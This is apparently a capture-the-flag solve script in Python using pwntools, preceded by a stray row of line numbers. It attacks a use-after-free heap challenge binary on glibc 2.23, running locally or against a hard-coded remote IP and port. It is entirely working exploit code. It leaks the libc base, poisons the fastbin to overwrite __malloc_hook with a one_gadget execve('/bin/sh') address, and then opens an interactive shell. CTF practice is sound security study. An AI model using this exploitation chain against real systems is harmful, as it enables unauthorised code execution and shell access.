1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74
|
from pwn import *
elf = ELF("./uaf_pwn") libc = ELF("/home/shoucheng/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so") ld = ELF("/home/shoucheng/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so") p = process(argv=[ld.path,elf.path],env={"LD_PRELOAD" : libc.path}) p = remote("82.157.5.28",51602) def debug(): gdb.attach(p,"b main")
def add(size): p.sendlineafter(">",'1') p.recvuntil("size>") p.sendline(str(size)) def edit(idx,content): p.sendlineafter(">",'3') p.recvuntil("index>") p.sendline(str(idx)) p.recvuntil("content>") p.send(content)
def show(idx): p.sendlineafter(">",'4') p.recvuntil("index>") p.sendline(str(idx))
def free(idx): p.sendlineafter(">",'2') p.recvuntil("index>") p.sendline(str(idx))
''' 0x45226 execve("/bin/sh", rsp+0x30, environ) constraints: rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL
0xf03a4 execve("/bin/sh", rsp+0x50, environ) constraints: [rsp+0x50] == NULL
0xf1247 execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL '''
p.recvuntil("0x") target = int(p.recv(12),16) log.info("target==>0x%x" %target) add(0x80) add(0x60) free(0) show(0) libc_base = u64(p.recv(6).ljust(8, '\x00')) - 0x3c4b78 log.info("libc_base==>0x%x" %libc_base) mlh = libc_base + libc.sym['__malloc_hook'] ogg = libc_base + 0x4527a add(0x60) free(1) free(2) edit(2, p64(mlh - 0x23)) add(0x60) add(0x60) edit(4, p8(0)*3 + p64(0)*2 +p64(ogg))
add(0x20)
p.interactive()
|